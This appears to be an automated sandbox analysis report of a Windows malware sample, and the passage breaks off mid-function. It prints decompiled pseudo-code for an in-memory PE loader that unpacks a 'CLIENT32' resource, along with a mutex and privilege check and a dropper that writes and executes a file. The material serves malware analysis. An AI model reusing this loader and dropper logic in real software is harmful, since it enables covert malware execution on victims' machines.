    • String ID: rG>v
    • API String ID: 3265022410-1829036858
    • Opcode ID: 2def9d3a3be4f8506a9b6e8ba13b53e10ce825c39f4286190d61d36d702771af
    • Instruction ID: ec8bd9fde627ceeacd4f15185c776401a25d513fd1e68c7bcfba551ce79bf91e
    • Opcode Fuzzy Hash: 2def9d3a3be4f8506a9b6e8ba13b53e10ce825c39f4286190d61d36d702771af
    • Instruction Fuzzy Hash: E0310976940309EBDB21AFA1DC58AFE3BB8FB08351F644115FA12D2261DB30D945DB71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 209 db1903-db1921 210 db1a1a-db1a20 209->210 211 db1927-db193b IsBadReadPtr 209->211 212 db1a19 211->212 213 db1941-db1947 211->213 212->210 214 db194c-db1951 213->214 214->212 215 db1957-db1966 LoadLibraryA 214->215 216 db196c-db197a call db1509 215->216 217 db1a15 215->217 219 db197f-db1984 216->219 217->212 219->217 220 db198a-db199b 219->220 221 db19a9-db19ad 220->221 222 db199d-db19a7 220->222 223 db19af-db19b3 221->223 222->223 224 db19f2-db19f6 223->224 225 db19b5-db19bb 223->225 224->212 227 db19f8-db1a0d IsBadReadPtr 224->227 226 db19bd 225->226 228 db19bf-db19c4 226->228 229 db19c6-db19c8 226->229 230 db1949 227->230 231 db1a13 227->231 232 db19cb-db19e1 GetProcAddress 228->232 229->232 230->214 231->212 233 db19ee 232->233 234 db19e3-db19ea 232->234 233->224 234->226 235 db19ec 234->235 235->224
    C-Code - Quality: 100%
    			E00DB1903(signed int* __ecx, signed int* _a4) {
    				intOrPtr* _v8;
    				signed int _v12;
    				struct HINSTANCE__* _v16;
    				intOrPtr _t40;
    				intOrPtr _t43;
    				struct HINSTANCE__* _t45;
    				intOrPtr _t48;
    				intOrPtr _t49;
    				signed int _t50;
    				CHAR* _t55;
    				_Unknown_base(*)()* _t56;
    				intOrPtr _t59;
    				signed int* _t60;
    				intOrPtr* _t64;
    				void* _t67;
    				intOrPtr* _t69;
    				signed int* _t71;
    				signed int _t79;
    
    				_t60 = __ecx;
    				_t64 = _a4;
    				_t40 =  *_t64;
    				_t59 =  *((intOrPtr*)(_t64 + 4));
    				_v12 = 1;
    				if( *((intOrPtr*)(_t40 + 0x84)) > 0) {
    					_t67 =  *((intOrPtr*)(_t40 + 0x80)) + _t59;
    					if(IsBadReadPtr(_t67, 0x14) == 0) {
    						_t69 = _t67 + 0x10;
    						_v8 = _t69;
    						while(1) {
    							_t43 =  *((intOrPtr*)(_t69 - 4));
    							if(_t43 == 0) {
    								goto L23;
    							}
    							_t45 = LoadLibraryA(_t43 + _t59); // executed
    							_v16 = _t45;
    							if(_t45 == 0xffffffff) {
    								L22:
    								_v12 = _v12 & 0x00000000;
    							} else {
    								_t48 = E00DB1509(_t60,  *((intOrPtr*)(_t64 + 8)), 4 +  *(_t64 + 0xc) * 4); // executed
    								 *((intOrPtr*)(_t64 + 8)) = _t48;
    								if(_t48 == 0) {
    									goto L22;
    								} else {
    									 *((intOrPtr*)(_t48 +  *(_t64 + 0xc) * 4)) = _v16;
    									 *(_t64 + 0xc) =  *(_t64 + 0xc) + 1;
    									_t49 =  *((intOrPtr*)(_t69 - 0x10));
    									if(_t49 == 0) {
    										_t71 =  *_t69 + _t59;
    										_t60 = _t71;
    									} else {
    										_t71 = _t49 + _t59;
    										_t60 =  *_v8 + _t59;
    									}
    									_t50 =  *_t71;
    									if(_t50 != 0) {
    										_a4 = _t60;
    										_a4 = _a4 - _t71;
    										_t79 = _t50;
    										L12:
    										L12:
    										if(_t79 >= 0) {
    											_t55 = _t50 + _t59 + 2;
    										} else {
    											_t55 = _t50 & 0x0000ffff;
    										}
    										_t56 = GetProcAddress(_v16, _t55);
    										_t60 = _a4;
    										 *(_t60 + _t71) = _t56;
    										if( *(_t60 + _t71) == 0) {
    											goto L18;
    										}
    										_t71 =  &(_t71[1]);
    										_t50 =  *_t71;
    										if(_t50 != 0) {
    											goto L12;
    										} else {
    										}
    										goto L19;
    										L18:
    										_v12 = _v12 & 0x00000000;
    									}
    									L19:
    									if(_v12 != 0) {
    										_v8 = _v8 + 0x14;
    										if(IsBadReadPtr(_v8 + 0xfffffff0, 0x14) == 0) {
    											_t69 = _v8;
    											continue;
    										} else {
    										}
    									}
    								}
    							}
    							goto L23;
    						}
    					}
    					L23:
    				}
    				return _v12;
    			}





















    0x00db1903
    0x00db190b
    0x00db190e
    0x00db1917
    0x00db191a
    0x00db1921
    0x00db1930
    0x00db193b
    0x00db1941
    0x00db1944
    0x00db194c
    0x00db194c
    0x00db1951
    0x00000000
    0x00000000
    0x00db195a
    0x00db1960
    0x00db1966
    0x00db1a15
    0x00db1a15
    0x00db196c
    0x00db197a
    0x00db197f
    0x00db1984
    0x00000000
    0x00db198a
    0x00db1990
    0x00db1993
    0x00db1996
    0x00db199b
    0x00db19ab
    0x00db19ad
    0x00db199d
    0x00db199d
    0x00db19a5
    0x00db19a5
    0x00db19af
    0x00db19b3
    0x00db19b5
    0x00db19b8
    0x00db19bb
    0x00000000
    0x00db19bd
    0x00db19bd
    0x00db19c8
    0x00db19bf
    0x00db19bf
    0x00db19bf
    0x00db19cf
    0x00db19d5
    0x00db19d8
    0x00db19e1
    0x00000000
    0x00000000
    0x00db19e3
    0x00db19e6
    0x00db19ea
    0x00000000
    0x00000000
    0x00db19ec
    0x00000000
    0x00db19ee
    0x00db19ee
    0x00db19ee
    0x00db19f2
    0x00db19f6
    0x00db19f8
    0x00db1a0d
    0x00db1949
    0x00000000
    0x00000000
    0x00db1a13
    0x00db1a0d
    0x00db19f6
    0x00db1984
    0x00000000
    0x00db1966
    0x00db194c
    0x00db1a19
    0x00db1a19
    0x00db1a20

    APIs
    • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00DB1933
    • LoadLibraryA.KERNEL32(?), ref: 00DB195A
    • GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00DB19CF
    • IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00DB1A05
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Read$AddressLibraryLoadProc
    • String ID:
    • API String ID: 2438460464-0
    • Opcode ID: b3ea2555b2242ec6d41b1f2bded9f25ac25eebfb539c71eccca8269abf44ab59
    • Instruction ID: 4c7abcd8f9d92e23b374657a7fb4a18dd34bf19b5e75dc8f78d05d9ef8433bc8
    • Opcode Fuzzy Hash: b3ea2555b2242ec6d41b1f2bded9f25ac25eebfb539c71eccca8269abf44ab59
    • Instruction Fuzzy Hash: 51317C7AA00215EFDB10CF58C8A4BA9B7B8FF05314F688169E856E7390D730ED55CB60
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 271 db13d0-db13e0 FindResourceA 272 db142f-db1431 271->272 273 db13e2-db13ed LoadResource 271->273 273->272 274 db13ef-db140c LockResource call db14f3 273->274 277 db140e-db1418 call db159c 274->277 278 db142c-db142e 274->278 281 db141a-db141b call db1705 277->281 282 db1420-db1421 call db1a94 277->282 278->272 281->282 285 db1426-db1427 call db14d8 282->285 285->278
    C-Code - Quality: 100%
    			E00DB13D0(CHAR* _a4) {
    				void* __edi;
    				struct HRSRC__* _t5;
    				void* _t7;
    				void* _t19;
    				void* _t22;
    
    				_t5 = FindResourceA(0, _a4, 0xa); // executed
    				if(_t5 != 0) {
    					_t7 = LoadResource(0, _t5);
    					if(_t7 != 0) {
    						_t22 = LockResource(_t7);
    						_t19 =  *((intOrPtr*)(_t22 + 4)) + _t22;
    						_t15 = E00DB14F3( *((intOrPtr*)(_t22 + 0x10)));
    						if(_t9 != 0) {
    							if(E00DB159C(_t19, _t15) ==  *((intOrPtr*)(_t22 + 0x10))) {
    								E00DB1705(_t15);
    							}
    							E00DB1A94(_t19, _t15); // executed
    							E00DB14D8(_t15);
    						}
    					}
    				}
    				return 0;
    			}








    0x00db13d8
    0x00db13e0
    0x00db13e5
    0x00db13ed
    0x00db13f9
    0x00db1401
    0x00db1408
    0x00db140c
    0x00db1418
    0x00db141b
    0x00db141b
    0x00db1421
    0x00db1427
    0x00db1427
    0x00db142e
    0x00db13ed
    0x00db1431

    APIs
    • FindResourceA.KERNEL32(00000000,00DB145D,0000000A), ref: 00DB13D8
    • LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00DB13E5
    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00DB13F3
      • Part of subcall function 00DB14F3: VirtualAlloc.KERNELBASE(00000000,00000004,00003000,00000004,00DB1408,?,?,?), ref: 00DB1500
      • Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(?,?,00002000,00000004,?,?,?,00DB1426,00000000,?,00000000,?,?,?), ref: 00DB1AE5
      • Part of subcall function 00DB1A94: VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B03
      • Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000014,?,?,?,00DB1426,00000000), ref: 00DB1B51
      • Part of subcall function 00DB1A94: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?,00DB1426,00000000), ref: 00DB1B67
      • Part of subcall function 00DB14D8: VirtualFree.KERNEL32(?,00000000,00008000,00DB154A,00DB197F,00000000,00DB197F,?,?,00000000,?,?,?,00DB197F), ref: 00DB14EA
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Virtual$Alloc$Resource$FindFreeLoadLock
    • String ID:
    • API String ID: 3090263981-0
    • Opcode ID: 2a93a522ad4203c4bc1a42c201755a8f06a0432b98d84adc6fb17207df865b97
    • Instruction ID: 146de31461ba5a6593f71401e3bae7c1d66dfc24aa1099e1e4034b6147daeb80
    • Opcode Fuzzy Hash: 2a93a522ad4203c4bc1a42c201755a8f06a0432b98d84adc6fb17207df865b97
    • Instruction Fuzzy Hash: E9F089BD700301E7D6307BB59CA9FAB76ADEF45791F848814F607D2141DB34D8408671
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00DB289C() {
    				intOrPtr _t23;
    				int _t32;
    				int _t39;
    				long _t51;
    				void* _t62;
    				void* _t63;
    				void* _t65;
    
    				_t63 = _t65 - 0x70;
    				_t51 =  *(_t63 + 0x7c);
    				 *((intOrPtr*)(_t63 + 0x68)) = 0;
    				 *(_t63 + 0x6c) = 0;
    				if(_t51 == 0) {
    					L17:
    					_t23 = 0;
    				} else {
    					 *_t51 = 0;
    					E00DB3510(_t63 - 0x34, 0, 0x9c);
    					 *(_t63 - 0x34) = 0x9c;
    					if(GetVersionExA(_t63 - 0x34) != 0) {
    						L3:
    						if( *((intOrPtr*)(_t63 - 0x30)) < 6) {
    							goto L17;
    						} else {
    							if(OpenProcessToken( *(_t63 + 0x78), 0x18, _t63 + 0x6c) == 0) {
    								GetLastError();
    							} else {
    								 *(_t63 + 0x7c) = 0;
    								_t32 = GetTokenInformation( *(_t63 + 0x6c), 0x19, 0, 0, _t63 + 0x7c); // executed
    								if(_t32 != 0) {
    									L13:
    									GetLastError();
    								} else {
    									if(GetLastError() != 0x7a) {
    										GetLastError();
    									} else {
    										_t62 = LocalAlloc(0x40,  *(_t63 + 0x7c));
    										if(_t62 == 0) {
    											goto L13;
    										} else {
    											_t39 = GetTokenInformation( *(_t63 + 0x6c), 0x19, _t62,  *(_t63 + 0x7c), _t63 + 0x7c); // executed
    											if(_t39 == 0) {
    												GetLastError();
    											} else {
    												 *_t51 =  *(GetSidSubAuthority( *_t62,  *(GetSidSubAuthorityCount( *_t62)) - 0x00000001 & 0x000000ff));
    												 *((intOrPtr*)(_t63 + 0x68)) = 1;
    											}
    											LocalFree(_t62);
    										}
    									}
    								}
    								CloseHandle( *(_t63 + 0x6c));
    							}
    							_t23 =  *((intOrPtr*)(_t63 + 0x68));
    						}
    					} else {
    						 *(_t63 - 0x34) = 0x94;
    						if(GetVersionExA(_t63 - 0x34) == 0) {
    							goto L17;
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _t23;
    			}










    0x00db289d
    0x00db28a8
    0x00db28af
    0x00db28b2
    0x00db28b7
    0x00db29ba
    0x00db29ba
    0x00db28bd
    0x00db28c8
    0x00db28ca
    0x00db28d5
    0x00db28e3
    0x00db28fa
    0x00db28fe
    0x00000000
    0x00db2904
    0x00db2915
    0x00db29af
    0x00db291b
    0x00db2926
    0x00db292f
    0x00db2933
    0x00db299e
    0x00db299e
    0x00db2935
    0x00db2940
    0x00db299a
    0x00db2942
    0x00db294d
    0x00db2951
    0x00000000
    0x00db2953
    0x00db2960
    0x00db2964
    0x00db298b
    0x00db2966
    0x00db2980
    0x00db2982
    0x00db2982
    0x00db2992
    0x00db2992
    0x00db2951
    0x00db2940
    0x00db29a7
    0x00db29a7
    0x00db29b5
    0x00db29b5
    0x00db28e5
    0x00db28e9
    0x00db28f4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00db28f4
    0x00db28e3
    0x00db29c3

    APIs
    • _memset.LIBCMT ref: 00DB28CA
    • GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
    • GetVersionExA.KERNEL32(?), ref: 00DB28F0
    • OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
    • GetLastError.KERNEL32 ref: 00DB293B
    • LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
    • GetLastError.KERNEL32 ref: 00DB298B
    • LocalFree.KERNEL32(00000000), ref: 00DB2992
    • GetLastError.KERNEL32 ref: 00DB299A
    • GetLastError.KERNEL32 ref: 00DB299E
    • CloseHandle.KERNEL32(?), ref: 00DB29A7
    • GetLastError.KERNEL32 ref: 00DB29AF
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$Token$AuthorityInformationLocalVersion$AllocCloseCountFreeHandleOpenProcess_memset
    • String ID:
    • API String ID: 1389885952-0
    • Opcode ID: c533ee97e57cb0e32d170df38876d5e25ad03f6a8c327d641d7dcab5fba30a3b
    • Instruction ID: 7b98956b8267b93bc455d03851ee87180ac9d8ba1f044d7941b38e675ee39a98
    • Opcode Fuzzy Hash: c533ee97e57cb0e32d170df38876d5e25ad03f6a8c327d641d7dcab5fba30a3b
    • Instruction Fuzzy Hash: 3531487A840318EFEB20AF65EC48AEE7BA8EF49341F240115F91AD2220D731C941DFB1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 74 401278-401288 75 40128a-401291 74->75 75->75 76 401293-4012a8 VirtualAlloc 75->76 76->76 77 4012aa-40132b CreateFileW 76->77 84 401331-40137a ReadFile lstrcmpW 77->84 85 4017f4-4017fc 77->85 89 401380-4013b0 CreateFileW 84->89 90 40140d-40142b 84->90 89->85 92 4013b6-401407 WriteFile ShellExecuteW ExitProcess 89->92 91 40142c-40142f 90->91 91->91 93 401431-40144c 91->93 96 401451-40145a 93->96 100 40146c-401484 96->100 101 40145c-40146a 96->101 106 401486-4014d8 call 401141 100->106 101->96 101->100 113 4014da-4014e2 106->113 115 4014e4-4014e6 113->115 116 4014e8-4014f3 113->116 115->116 117 4014f4-401501 115->117 116->117 117->113 119 401503-401506 117->119 120 401509-401513 119->120 121 401521-40152a 120->121 122 401515-40151f 120->122 121->120 125 40152c-401531 121->125 122->121 126 401533-40153c 125->126 127 40153f-401544 125->127 126->127 128 401552 127->128 129 401546-40154f 127->129 130 401557-40157a 128->130 129->128 136 401581-401586 130->136 137 40157c-40157d 130->137 139 40158b-4015b1 136->139 137->130 138 40157f 137->138 138->120 143 4015b3-4015b4 139->143 144 4015bb-4015c0 139->144 143->139 145 4015b6 143->145 146 4015c5-4015d4 144->146 145->120 148 4015d6-4015d7 146->148 149 4015de-4015f7 146->149 148->146 150 4015d9 148->150 151 4015fc-40160e 149->151 150->120 153 401610-401614 151->153 154 40164b-401655 151->154 153->154 155 401616-401620 153->155 154->120 156 40165b-40166a 154->156 155->154 157 401622-401623 155->157 158 401670-401698 156->158 159 401707-4017ce 156->159 157->151 160 401625-40163a 157->160 165 40169b-4016a4 158->165 187 4017d1-4017d5 159->187 161 401646 160->161 162 40163c-40163f 160->162 161->120 162->161 165->165 167 4016a6-4016d9 165->167 170 401701-401704 167->170 171 4016db-4016f0 167->171 170->159 172 4016f2-4016f5 171->172 173 4016fc 171->173 172->173 173->120 188 4017d7-4017dd 187->188 189 4017df-4017e2 187->189 188->189 190 4017e4 189->190 191 4017e5-4017e9 189->191 190->191 191->187 192 4017eb-4017ee 191->192 192->85 192->120
    APIs
    • VirtualAlloc.KERNELBASE(00000000,00A6EE60,00001000,00000004), ref: 004012A0
    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401322
    • ReadFile.KERNELBASE(?,?,?,?,00000000,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401366
    • lstrcmpW.KERNELBASE(?,?,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401372
    • CreateFileW.KERNELBASE(?,40000000,00000002,00000000,00000002,00000080,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013A8
    • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013C4
    • ShellExecuteW.SHELL32(00000000,00000000,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004013FF
    • ExitProcess.KERNELBASE(00000000,?,?,00000000,?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401407
    Memory Dump Source
    • Source File: 00000001.00000002.1212668515.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.1212660695.00400000.00000004.sdmp
    • Associated: 00000001.00000002.1212676117.00402000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: File$Create$AllocExecuteExitProcessReadShellVirtualWritelstrcmp
    • String ID:
    • API String ID: 3734528952-0
    • Opcode ID: 997a922c275003f903be381bb82019e38aafddd869d9bf8e0cd261d09117cbb6
    • Instruction ID: 64cf2b4e31a5b2b98cadcca01765f079aa3efa7d172f38e8ef5b84d31c2c6752
    • Opcode Fuzzy Hash: 997a922c275003f903be381bb82019e38aafddd869d9bf8e0cd261d09117cbb6
    • Instruction Fuzzy Hash: 0C023E71A00214AFEF149FA8CC49BEEBBB9EF48311F144169F909EB291DA749D41CB64
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 193 db2291-db22b9 call db3510 call db2604 198 db22bb-db22cf CreateMutexA 193->198 199 db22d7-db22db 193->199 198->199 200 db22d1 GetLastError 198->200 200->199
    C-Code - Quality: 100%
    			E00DB2291(void* __eflags) {
    				struct _SECURITY_ATTRIBUTES _v16;
    				void* _t7;
    				void* _t10;
    				void* _t12;
    
    				_t12 = 0;
    				E00DB3510( &_v16, 0, 0xc);
    				_t7 = E00DB2604( &_v16, 0x1f0001); // executed
    				if(_t7 != 0) {
    					_t10 = CreateMutexA( &_v16, 0, "Global\\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}"); // executed
    					_t12 = _t10;
    					if(_t12 == 0) {
    						GetLastError();
    					}
    				}
    				return _t12;
    			}







    0x00db229a
    0x00db22a1
    0x00db22b2
    0x00db22b9
    0x00db22c5
    0x00db22cb
    0x00db22cf
    0x00db22d1
    0x00db22d1
    0x00db22cf
    0x00db22db

    APIs
    • _memset.LIBCMT ref: 00DB22A1
      • Part of subcall function 00DB2604: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00DB22B7,00000000,00000000,00000000), ref: 00DB262D
      • Part of subcall function 00DB2604: _memset.LIBCMT ref: 00DB2645
      • Part of subcall function 00DB2604: SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00DB2678
      • Part of subcall function 00DB2604: LocalAlloc.KERNEL32(00000040,00000014), ref: 00DB2690
      • Part of subcall function 00DB2604: _memset.LIBCMT ref: 00DB26A7
      • Part of subcall function 00DB2604: InitializeSecurityDescriptor.ADVAPI32(00DB22B7,00000001), ref: 00DB26B4
      • Part of subcall function 00DB2604: SetSecurityDescriptorDacl.ADVAPI32(00DB22B7,00000001,7622DAA3,00000000), ref: 00DB26CB
      • Part of subcall function 00DB2604: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DB26EC
      • Part of subcall function 00DB2604: GetProcAddress.KERNEL32(00000000), ref: 00DB26F3
      • Part of subcall function 00DB2604: LocalAlloc.KERNELBASE(00000040,00000200), ref: 00DB270C
      • Part of subcall function 00DB2604: InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00DB2718
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB2777
      • Part of subcall function 00DB2604: LocalFree.KERNEL32(00000000), ref: 00DB277E
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB2786
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27A3
      • Part of subcall function 00DB2604: LocalFree.KERNEL32(00DB22B7), ref: 00DB27AC
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27B0
      • Part of subcall function 00DB2604: LocalFree.KERNEL32(7622DAA3), ref: 00DB27B9
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27BD
      • Part of subcall function 00DB2604: FreeSid.ADVAPI32(00DB22B7), ref: 00DB27C6
      • Part of subcall function 00DB2604: GetLastError.KERNEL32 ref: 00DB27CE
    • CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
    • GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1
    Strings
    • Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}, xrefs: 00DB22BB
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$Local$Free$Initialize_memset$AllocDescriptorSecurity$AddressAllocateCreateDaclEntriesLibraryLoadMutexProc
    • String ID: Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}
    • API String ID: 875962283-4277701779
    • Opcode ID: 61b5212c2145b42a4937cef9afd2b4889bb2102db4dc2003e7beb477da48dca3
    • Instruction ID: 2907819634384cf59286a95c3c23732b41fa501f8bdabc6b34577230f0cf9767
    • Opcode Fuzzy Hash: 61b5212c2145b42a4937cef9afd2b4889bb2102db4dc2003e7beb477da48dca3
    • Instruction Fuzzy Hash: 92E0927BE01328F7CB20B3E5AC0ADDB7B6CCB04790B400120BE02E3242EA64D644C2F4
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 201 db1434-db1444 IsUserAnAdmin call db2291 204 db1463-db1466 201->204 205 db1446-db1451 GetLastError 201->205 206 db145d-db145e CloseHandle 205->206 207 db1453-db1458 call db13d0 205->207 206->204 207->206
    C-Code - Quality: 75%
    			E00DB1434(void* __eflags) {
    				void* _t1;
    				void* _t6;
    
    				__imp__#680(); // executed
    				_t1 = E00DB2291(__eflags); // executed
    				_t6 = _t1;
    				if(_t6 != 0) {
    					if(GetLastError() != 0xb7) {
    						E00DB13D0("CLIENT32");
    					}
    					CloseHandle(_t6);
    				}
    				return 0;
    			}





    0x00db1435
    0x00db143b
    0x00db1440
    0x00db1444
    0x00db1451
    0x00db1458
    0x00db1458
    0x00db145e
    0x00db145e
    0x00db1466

    APIs
    • IsUserAnAdmin.SHELL32 ref: 00DB1435
      • Part of subcall function 00DB2291: _memset.LIBCMT ref: 00DB22A1
      • Part of subcall function 00DB2291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22C5
      • Part of subcall function 00DB2291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00DB232C,00000000), ref: 00DB22D1
    • GetLastError.KERNEL32(?,?), ref: 00DB1446
    • CloseHandle.KERNEL32(00000000), ref: 00DB145E
      • Part of subcall function 00DB13D0: FindResourceA.KERNEL32(00000000,00DB145D,0000000A), ref: 00DB13D8
      • Part of subcall function 00DB13D0: LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00DB13E5
      • Part of subcall function 00DB13D0: LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00DB13F3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: Resource$ErrorLast$AdminCloseCreateFindHandleLoadLockMutexUser_memset
    • String ID: CLIENT32
    • API String ID: 2587862435-3575452709
    • Opcode ID: 5e532bea3d047ae839706050cdae8f1f469a0922511ca5dc8368bc7e16463057
    • Instruction ID: 6df9904ed418aebc57bfd456ec4aa4947daf95fb710082208be109f62b15bdcb
    • Opcode Fuzzy Hash: 5e532bea3d047ae839706050cdae8f1f469a0922511ca5dc8368bc7e16463057
    • Instruction Fuzzy Hash: 33D0123E905722CA9351337D7C3D5DD2250DF517D1BD90664F907E5A15DB04CD8241FA
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 236 db1a94-db1aab 237 db1aad-db1aaf 236->237 238 db1ab4-db1ac9 236->238 239 db1c2f-db1c30 237->239 240 db1acb-db1acd 238->240 241 db1ad2-db1af2 VirtualAlloc 238->241 240->239 242 db1b0c-db1b10 241->242 243 db1af4-db1b09 VirtualAlloc 241->243 244 db1b19-db1bbb call db14f3 VirtualAlloc * 2 call db1489 call db171c 242->244 245 db1b12-db1b14 242->245 243->242 252 db1bc8-db1bd2 call db1903 244->252 253 db1bbd-db1bc3 call db1884 244->253 245->239 257 db1bd8-db1bdb call db17bf 252->257 258 db1bd4 252->258 253->252 261 db1be0-db1be9 257->261 259 db1c25-db1c2d call db1a23 258->259 259->239 263 db1beb-db1bf9 261->263 264 db1c20-db1c23 261->264 266 db1bfb 263->266 267 db1bff-db1c10 263->267 264->239 264->259 266->259 269 db1c12 267->269 270 db1c16-db1c19 267->270 269->259 270->264
    C-Code - Quality: 63%
    			E00DB1A94(void* __edi, signed short* _a4) {
    				void* _v8;
    				signed short* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void* _v28;
    				signed int* _v32;
    				intOrPtr* _v36;
    				void* _t84;
    				void* _t93;
    				void* _t104;
    				signed int* _t129;
    				intOrPtr _t131;
    				void* _t132;
    
    				_t132 = __edi;
    				_v12 = _a4;
    				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
    					_v36 = _a4 + _v12[0x1e];
    					if( *_v36 == 0x4550) {
    						_t84 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x2000, 4); // executed
    						_v16 = _t84;
    						if(_v16 == 0) {
    							_v16 = VirtualAlloc(0,  *(_v36 + 0x50), 0x2000, 4);
    						}
    						if(_v16 != 0) {
    							_v28 = E00DB14F3(0x14);
    							 *((intOrPtr*)(_v28 + 4)) = _v16;
